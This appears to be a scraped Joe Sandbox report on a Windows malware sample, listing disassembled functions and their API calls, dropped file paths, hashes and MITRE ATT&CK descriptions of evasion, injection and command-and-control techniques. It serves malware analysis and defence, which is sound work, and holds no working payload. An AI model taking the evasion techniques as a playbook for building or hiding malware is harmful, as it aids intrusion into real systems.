Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction ID: 78b8b48c00cf9c642473ee3ff4bb8652c0e006dd03d895f02bd3b5106f733cf3
Opcode Fuzzy Hash: 2142c290a1f943eea3cbcd359024918697fc3eca74c4b32021e9b526f4e7b2b2
Instruction Fuzzy Hash: AA015E71200608AFDF205F11DD80A6F37A5EB84750F14443AFA41B51D1D73A8C929EAA

Function 00405E87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,004060CB,80000002), ref: 00405ECD
RegCloseKey.ADVAPI32(?,?,004060CB,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405ED8

Strings

: Completed, xrefs: 00405E8A, 00405EBE

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
Instruction ID: 161d8fcf8587aa93f0d987360409ed3ef12a8a36c24b5ed9f98f318b00ae4845
Opcode Fuzzy Hash: 81da800dade96896110552a5810a24f143c54bb094b4f61591ae75c107ad8ff5
Instruction Fuzzy Hash: E0015A72500609EBDF228F61CD09FDB3BA8EF55364F00402AFA95A2191D778DA54DBA4

Function 00403739 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76233410,00000000,C:\Users\user\AppData\Local\Temp\,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
GlobalFree.KERNEL32(00000000), ref: 0040375A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403739

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction ID: b24f28e728a59e08de23ecbb17507a5b71a11735b8e3b636be16efbcbefcbfb5
Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
Instruction Fuzzy Hash: F7E0127351212097C7217F69EE4875AB7A86F46F22F09507AE8447B26487745C428BDC

Function 0040597F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3lH2EWD4wU.exe,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405985
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DCF,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3lH2EWD4wU.exe,C:\Users\user\Desktop\3lH2EWD4wU.exe,80000000,00000003), ref: 00405993

Strings

C:\Users\user\Desktop, xrefs: 0040597F

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction ID: ff79c929155de07913877b57a895d1bbe205444e8a13cf8e1c8c73a821d1827b
Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction Fuzzy Hash: CDD0C7B3409E70AEF30353149D04B9FAA58DF16710F090466F580E6191C67C4D428BFD

Function 00405A9E Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3lH2EWD4wU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh04k5c3.vap.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvtivhly.ifu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj5z0h4u.kez.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uga2spzi.vbw.psm1

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Drtrsklers.gje

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Netvrkslsninger.txt

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\Revisionistiskes.int

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\fortje.kur

C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Zigzaggy.aci

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
3lH2EWD4wU.exe

Function 0040320C Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 366
stringcomfileCOMMON

Function 00405205 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00403B6B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 004037CE Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405FC2 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00402F9C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405B68 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 0040563F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 004023D6 Relevance: 4.6, APIs: 3, Instructions: 64
registrystringCOMMON